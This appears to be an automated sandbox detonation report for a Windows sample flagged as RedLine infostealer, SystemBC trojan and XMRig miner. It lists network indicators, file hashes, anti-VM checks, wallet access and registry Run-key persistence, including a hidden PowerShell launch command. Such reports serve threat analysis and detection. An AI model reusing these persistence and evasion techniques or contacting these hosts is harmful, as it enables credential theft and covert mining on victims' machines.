cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpD73D.tmp.bat""

C:\Windows\SysWOW64\timeout.exe

timeout 7

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

Network

Country Destination Domain Proto
RU 62.204.41.23:80 62.204.41.23 tcp
RU 62.204.41.23:80 62.204.41.23 tcp
RU 62.204.41.23:80 62.204.41.23 tcp
US 8.8.8.8:53 maper.info udp
DE 148.251.234.93:443 maper.info tcp
DE 148.251.234.93:443 maper.info tcp
US 8.8.8.8:53 pool.hashvault.pro udp
US 142.202.242.43:80 pool.hashvault.pro tcp

Files

memory/1704-54-0x0000000001060000-0x000000000107C000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 401674612435a6f7e662f3650aa496ff
SHA1 844e3d3afeed1e0d03baf6b3967ed90bac4c0409
SHA256 49d04f3197eed5b91b740cbe795a6e11eb802ba6d6202791973f3606190fe5dd
SHA512 3d159657f6419912fe5791ba6bb42d1d863b9e2666932ccd195a2d381e280c9ab8088cafa7dc543d3cabea4674a9bec27ae1a891c3a1ecc192714b26e0a4c46d

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\T04CQVNDBO2W2SE07WN4.temp

MD5 401674612435a6f7e662f3650aa496ff
SHA1 844e3d3afeed1e0d03baf6b3967ed90bac4c0409
SHA256 49d04f3197eed5b91b740cbe795a6e11eb802ba6d6202791973f3606190fe5dd
SHA512 3d159657f6419912fe5791ba6bb42d1d863b9e2666932ccd195a2d381e280c9ab8088cafa7dc543d3cabea4674a9bec27ae1a891c3a1ecc192714b26e0a4c46d

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 401674612435a6f7e662f3650aa496ff
SHA1 844e3d3afeed1e0d03baf6b3967ed90bac4c0409
SHA256 49d04f3197eed5b91b740cbe795a6e11eb802ba6d6202791973f3606190fe5dd
SHA512 3d159657f6419912fe5791ba6bb42d1d863b9e2666932ccd195a2d381e280c9ab8088cafa7dc543d3cabea4674a9bec27ae1a891c3a1ecc192714b26e0a4c46d

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 401674612435a6f7e662f3650aa496ff
SHA1 844e3d3afeed1e0d03baf6b3967ed90bac4c0409
SHA256 49d04f3197eed5b91b740cbe795a6e11eb802ba6d6202791973f3606190fe5dd
SHA512 3d159657f6419912fe5791ba6bb42d1d863b9e2666932ccd195a2d381e280c9ab8088cafa7dc543d3cabea4674a9bec27ae1a891c3a1ecc192714b26e0a4c46d

memory/268-74-0x000000001B170000-0x000000001B452000-memory.dmp

memory/888-75-0x0000000001E20000-0x0000000001E28000-memory.dmp

memory/1172-77-0x0000000001FB4000-0x0000000001FB7000-memory.dmp

memory/1172-76-0x0000000001FB0000-0x0000000002030000-memory.dmp

memory/888-78-0x00000000028D0000-0x0000000002950000-memory.dmp

memory/888-80-0x00000000028D0000-0x0000000002950000-memory.dmp

memory/1172-79-0x0000000001FBB000-0x0000000001FF2000-memory.dmp

memory/268-81-0x0000000002910000-0x0000000002990000-memory.dmp

memory/888-82-0x00000000028D0000-0x0000000002950000-memory.dmp

memory/268-83-0x0000000002910000-0x0000000002990000-memory.dmp

memory/1684-84-0x0000000002720000-0x00000000027A0000-memory.dmp

memory/1684-85-0x0000000002720000-0x00000000027A0000-memory.dmp

memory/1684-86-0x0000000002720000-0x00000000027A0000-memory.dmp

memory/888-87-0x00000000028D0000-0x0000000002950000-memory.dmp

memory/268-88-0x0000000002910000-0x0000000002990000-memory.dmp

memory/1684-89-0x0000000002690000-0x000000000269E000-memory.dmp

memory/1684-90-0x000000001B670000-0x000000001B680000-memory.dmp

memory/268-91-0x0000000002910000-0x0000000002990000-memory.dmp

memory/888-92-0x00000000028D0000-0x0000000002950000-memory.dmp

memory/268-93-0x0000000002910000-0x0000000002990000-memory.dmp

\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 08e3930a42197a422d064569c4778997
SHA1 74832aa332b48422e5d448f5099b397e84c18712
SHA256 322626ca37f3929c517b4c0ceeb130836be5f36a1eb68ab0adb00c0f4a3f3813
SHA512 b70952bc3cd54abcc2c7c1c71b1f16d96a001900574237263a210512a348542e6ec7a05e7fcc0ff5831a200db23fae06f2bbb0f0bb249599fed0fa1761516368

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 08e3930a42197a422d064569c4778997
SHA1 74832aa332b48422e5d448f5099b397e84c18712
SHA256 322626ca37f3929c517b4c0ceeb130836be5f36a1eb68ab0adb00c0f4a3f3813
SHA512 b70952bc3cd54abcc2c7c1c71b1f16d96a001900574237263a210512a348542e6ec7a05e7fcc0ff5831a200db23fae06f2bbb0f0bb249599fed0fa1761516368

memory/1872-109-0x000000013F3D0000-0x000000013FD9A000-memory.dmp

memory/1496-116-0x0000000000400000-0x000000000083B000-memory.dmp

\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/1496-120-0x0000000004380000-0x0000000004381000-memory.dmp

memory/1496-121-0x0000000004360000-0x0000000004361000-memory.dmp

memory/1496-122-0x0000000004390000-0x0000000004391000-memory.dmp

memory/1496-124-0x0000000004370000-0x0000000004371000-memory.dmp

C:\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

memory/1496-128-0x00000000008A0000-0x00000000008A1000-memory.dmp

\??\c:\users\admin\appdata\roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1996-135-0x00000000022E4000-0x00000000022E7000-memory.dmp

memory/1220-137-0x00000000010A0000-0x00000000014C0000-memory.dmp

memory/1996-136-0x00000000022EB000-0x0000000002322000-memory.dmp

memory/1220-138-0x00000000010A0000-0x00000000014C0000-memory.dmp

memory/1220-139-0x0000000005C50000-0x0000000005C90000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

\??\c:\programdata\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

memory/1496-157-0x0000000000400000-0x000000000083B000-memory.dmp

memory/1868-159-0x0000000000AA0000-0x0000000000EC0000-memory.dmp

memory/1220-158-0x00000000010A0000-0x00000000014C0000-memory.dmp

memory/1868-161-0x0000000000AA0000-0x0000000000EC0000-memory.dmp

memory/1868-162-0x0000000000AA0000-0x0000000000EC0000-memory.dmp

memory/1220-160-0x0000000006F30000-0x0000000007350000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpD73D.tmp.bat

MD5 f65f0849d6c5cdb941bf796d05c4b6ba
SHA1 1a9e41a79c84170c2d0ea2efa3b2b3a56a912918
SHA256 70f531d5890a88bdc95401aa9234d48d447db6c9148a66278caab3bf878b94ab
SHA512 17619eb9b88cdc0c7a9be3392fe172796d481679841c0554841ece31186fd09bc283f346df89a0f90edee41e656188fe73cf78d481b940cee17e1a32c2d58abb

memory/1868-163-0x0000000005C60000-0x0000000005CA0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpD73D.tmp.bat

MD5 f65f0849d6c5cdb941bf796d05c4b6ba
SHA1 1a9e41a79c84170c2d0ea2efa3b2b3a56a912918
SHA256 70f531d5890a88bdc95401aa9234d48d447db6c9148a66278caab3bf878b94ab
SHA512 17619eb9b88cdc0c7a9be3392fe172796d481679841c0554841ece31186fd09bc283f346df89a0f90edee41e656188fe73cf78d481b940cee17e1a32c2d58abb

memory/1676-165-0x000000013F040000-0x000000013FA0A000-memory.dmp

memory/1676-167-0x000000013F040000-0x000000013FA0A000-memory.dmp

memory/2000-168-0x0000000000100000-0x0000000000120000-memory.dmp

memory/1600-169-0x0000000140000000-0x0000000140029000-memory.dmp

memory/1496-170-0x0000000000400000-0x000000000083B000-memory.dmp

memory/1496-171-0x0000000000400000-0x000000000083B000-memory.dmp

memory/1868-172-0x0000000000AA0000-0x0000000000EC0000-memory.dmp

memory/2000-173-0x0000000002040000-0x0000000002060000-memory.dmp

memory/2000-174-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1220-175-0x0000000006F30000-0x0000000007350000-memory.dmp

memory/1868-176-0x0000000000AA0000-0x0000000000EC0000-memory.dmp

memory/1600-177-0x0000000140000000-0x0000000140029000-memory.dmp

memory/1868-178-0x0000000005C60000-0x0000000005CA0000-memory.dmp

memory/1496-179-0x0000000000400000-0x000000000083B000-memory.dmp

memory/1868-180-0x0000000000AA0000-0x0000000000EC0000-memory.dmp

memory/2000-181-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/2000-183-0x0000000002040000-0x0000000002060000-memory.dmp

memory/1496-184-0x0000000000400000-0x000000000083B000-memory.dmp

memory/1868-185-0x0000000000AA0000-0x0000000000EC0000-memory.dmp

memory/2000-186-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1496-188-0x0000000000400000-0x000000000083B000-memory.dmp

memory/1868-189-0x0000000000AA0000-0x0000000000EC0000-memory.dmp

memory/2000-190-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1496-192-0x0000000000400000-0x000000000083B000-memory.dmp

memory/1868-193-0x0000000000AA0000-0x0000000000EC0000-memory.dmp

memory/2000-194-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1496-196-0x0000000000400000-0x000000000083B000-memory.dmp

memory/1868-197-0x0000000000AA0000-0x0000000000EC0000-memory.dmp

memory/2000-198-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1496-200-0x0000000000400000-0x000000000083B000-memory.dmp

memory/1868-201-0x0000000000AA0000-0x0000000000EC0000-memory.dmp

memory/2000-202-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1496-204-0x0000000000400000-0x000000000083B000-memory.dmp

memory/1868-205-0x0000000000AA0000-0x0000000000EC0000-memory.dmp

memory/2000-206-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1496-208-0x0000000000400000-0x000000000083B000-memory.dmp

memory/1868-209-0x0000000000AA0000-0x0000000000EC0000-memory.dmp

memory/2000-210-0x0000000140000000-0x00000001407EF000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-05-04 11:05

Reported

2023-05-04 11:07

Platform

win10v2004-20230221-en

Max time kernel

151s

Max time network

153s

Command Line

C:\Windows\Explorer.EXE

Signatures

RedLine

infostealer redline

SystemBC

trojan systembc

xmrig

miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\dllhost.exe N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\dllhost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\dllhost.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\lsass.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Software\Wine C:\Users\Admin\AppData\Roaming\dllhost.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\ProgramData\\lsass\\lsass.exe" C:\Users\Admin\AppData\Roaming\lsass.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Software\Microsoft\Windows\CurrentVersion\Run C:\Users\Admin\AppData\Roaming\dllhost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Roaming\\dllhost.exe'\"" C:\Users\Admin\AppData\Roaming\dllhost.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\lsass.exe N/A
N/A N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4656 wrote to memory of 4716 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4656 wrote to memory of 4716 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4656 wrote to memory of 4600 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4656 wrote to memory of 4600 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
